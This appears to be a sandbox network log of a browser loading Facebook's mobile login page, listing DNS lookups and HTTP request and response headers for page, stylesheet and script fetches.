          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://m.facebook.com/ajax/mtouch_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/m.facebook.com\/ajax\/mtouch_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(self), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(self), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(self), gyroscope=(self), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(self), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: same-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          access-control-expose-headers: X-FB-Debug, X-Loader-Length, X-Stack
          access-control-allow-methods: OPTIONS
          access-control-allow-credentials: true
          access-control-allow-origin: https://m.facebook.com
          vary: Origin
          vary: Accept-Encoding
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: application/x-javascript; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: uSKdV7donX6w+fNrbALJYqp+ZMcPYSIwWyKjXiL2cUh/HGNDGrZO8m11uUG+AXP8gMrL0Y7S42qKuj5p290LVQ==
          date: Thu, 04 Apr 2024 22:29:55 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=50, rtx=0, c=10, mss=1357, tbw=34159, tp=-1, tpl=-1, uplat=45, ullat=1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          POST
          https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=4&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.35:443
          Request
          POST /a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=4&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0 HTTP/2.0
          host: m.facebook.com
          accept: */*
          origin: https://m.facebook.com
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          x-response-format: JSONStream
          x-requested-with: XMLHttpRequest
          x-fb-lsd: AVoK_ucW--w
          x-asbd-id: 129477
          x-fb-background-state: 1
          content-type: multipart/form-data; boundary=---------------------------7e82391930294
          accept-encoding: gzip, deflate, br
          content-length: 974
          cache-control: no-cache
          Response
          HTTP/2.0 200
          content-encoding: br
          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://m.facebook.com/ajax/mtouch_error_reports/?device_level=unknown", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/m.facebook.com\/ajax\/mtouch_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(self), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(self), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(self), gyroscope=(self), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(self), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: same-origin
          cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
          cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
          pragma: no-cache
          cache-control: private, no-cache, no-store, must-revalidate
          expires: Sat, 01 Jan 2000 00:00:00 GMT
          x-content-type-options: nosniff
          x-xss-protection: 0
          x-frame-options: DENY
          access-control-expose-headers: X-FB-Debug, X-Loader-Length, X-Stack
          access-control-allow-methods: OPTIONS
          access-control-allow-credentials: true
          access-control-allow-origin: https://m.facebook.com
          vary: Origin
          vary: Accept-Encoding
          accept-ch-lifetime: 4838400
          accept-ch: viewport-width,dpr,Sec-CH-Prefers-Color-Scheme,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Platform-Version,Sec-CH-UA-Model
          content-type: application/x-javascript; charset=utf-8
          strict-transport-security: max-age=15552000; preload; includeSubDomains
          x-fb-debug: 0V2lCfMJhMprbgG161UdKAZTvNled2eK3opc7CPvLRXoxM3OVvT8InBE43w3vRgheDTnl5let0CLmtuxgO0Jmw==
          date: Thu, 04 Apr 2024 22:30:26 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=53, rtx=0, c=10, mss=1357, tbw=37359, tp=-1, tpl=-1, uplat=46, ullat=2
          alt-svc: h3=":443"; ma=86400
        • flag-us
          DNS
          78.204.58.216.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          78.204.58.216.in-addr.arpa
          IN PTR
          Response
          78.204.58.216.in-addr.arpa
          IN PTR
          lhr48s49-in-f141e100net
          78.204.58.216.in-addr.arpa
          IN PTR
          lhr25s13-in-f78�H
          78.204.58.216.in-addr.arpa
          IN PTR
          lhr25s13-in-f14�H
        • flag-us
          DNS
          3.180.250.142.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          3.180.250.142.in-addr.arpa
          IN PTR
          Response
          3.180.250.142.in-addr.arpa
          IN PTR
          lhr25s32-in-f31e100net
        • flag-us
          DNS
          36.200.250.142.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          36.200.250.142.in-addr.arpa
          IN PTR
          Response
          36.200.250.142.in-addr.arpa
          IN PTR
          lhr48s30-in-f41e100net
        • flag-us
          DNS
          35.210.240.157.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          35.210.240.157.in-addr.arpa
          IN PTR
          Response
          35.210.240.157.in-addr.arpa
          IN PTR
          edge-star-mini-shv-01-ham3facebookcom
        • flag-us
          DNS
          static.xx.fbcdn.net
          MicrosoftEdge.exe
          Remote address:
          8.8.8.8:53
          Request
          static.xx.fbcdn.net
          IN A
          Response
          static.xx.fbcdn.net
          IN CNAME
          scontent.xx.fbcdn.net
          scontent.xx.fbcdn.net
          IN A
          157.240.210.14
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/w9IxuTxjQin.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yi/l/0,cross/w9IxuTxjQin.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:43:50 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: OkYxnnskrpSFE2HEdz/9XA==
          x-fb-debug: iFqDabVOqeLmNlqjanmxl0fSBGU8gc5iGYt+G21jKjMQsAV2/MR23rf3CS61Mi4LE89aVGo5ggiMl+Tr19cg0A==
          content-length: 926
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=3734, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/svlhEGhpRGI.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yO/l/0,cross/svlhEGhpRGI.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Mon, 31 Mar 2025 04:03:04 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: U/n8IPg+o5MOIzUG4r8Qnw==
          x-fb-debug: GoMF+U+bLkQuR3JMhBd3gmwqWxZ/NSxYJVx8u1ilIaGHmj3qR0SKSEnUTHkLlbhIkeUv+V8WDvyAmFaU+ahl2w==
          content-length: 1642
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=5912, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/klHCvhQp6_r.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yd/l/0,cross/klHCvhQp6_r.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Thu, 03 Apr 2025 15:39:43 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: kIxLmisZ6tQKSCcWGTRx1A==
          x-fb-debug: sN0bd7Tx2kQHSGqh0bfwnM/w4lqs0ApIJ22kSWs6X34G9TFKw2LlUGnNi52IbNpzKOiHKv6T1++6gSgZP9piNg==
          content-length: 694
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=5912, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/bqJfhGimWwz.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yu/l/0,cross/bqJfhGimWwz.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Fri, 04 Apr 2025 15:20:39 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: Z3DWnYGRSKoywWsDP2z3hQ==
          x-fb-debug: XH+c7iHhYQU6XOfDpZdaLlsQo+sjnZO5ePv0b1fOcxDxz6x/j8CKx6GSOyz3NA8EMR90n82nhnsfNiYMsuujEQ==
          content-length: 5131
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=6870, tp=-1, tpl=-1, uplat=3, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/vnNx2sY6eQO.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yN/l/0,cross/vnNx2sY6eQO.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Fri, 04 Apr 2025 15:21:27 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: MGkv+1IAVIZ9HRp4fWfMkA==
          x-fb-debug: WxE9I+MDn25EgXjjXojTrn/c2V7t2fvi8K0QJr3Fc25Aj2Z+7y6KEGOHlI0+/RCjhD9T7nQWUdpG3sGfm0/t4A==
          content-length: 8844
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=14822, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yD/l/0,cross/gs1ceLRw214.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yD/l/0,cross/gs1ceLRw214.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: image/svg+xml
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 02:56:02 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          x-fb-optimizer: 0
          content-md5: mOuWB7wXlE6XUTOVRHYuCQ==
          x-fb-debug: B3RMNuU6EoTMz7wQfyHpxnTl0NjicWog5xhC3cU6V+kN5HUqISC5glM0W4ttUfZPmjw1+LsF9wCdOPFRHE3G0w==
          content-length: 956
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=23166, tp=-1, tpl=-1, uplat=1, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0,cross/wsPwijQ92SI.css?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/yL/l/0,cross/wsPwijQ92SI.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: text/css, */*
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          vary: Accept-Encoding
          content-encoding: br
          content-type: text/css; charset=utf-8
          access-control-allow-origin: *
          last-modified: Mon, 01 Jan 2001 08:00:00 GMT
          expires: Sat, 29 Mar 2025 00:28:23 GMT
          cache-control: public,max-age=31536000,immutable
          reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
          timing-allow-origin: *
          document-policy: force-load-at-top
          permissions-policy: accelerometer=(), ambient-light-sensor=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
          cross-origin-resource-policy: cross-origin
          x-content-type-options: nosniff
          report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
          content-md5: +MY6HqKVvYs9L3x4iSdhkQ==
          x-fb-debug: UwBCqopI8p1EYheRaFE3A4Bvdy5t5+nL6jljqg5YOQpIiu51M2hxeeupIMEuytdwvDf0g9ExUzkdq/2T6c39BQ==
          content-length: 4995
          date: Thu, 04 Apr 2024 22:29:23 GMT
          x-fb-connection-quality: GOOD; q=0.7, rtt=57, rtx=0, c=13, mss=1357, tbw=25383, tp=-1, tpl=-1, uplat=2, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-de
          GET
          https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/x8fxRhSHavo.js?_nc_x=Ij3Wp8lg5Kz
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /rsrc.php/v3/ya/r/x8fxRhSHavo.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
          host: static.xx.fbcdn.net
          accept: application/javascript, */*;q=0.8
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
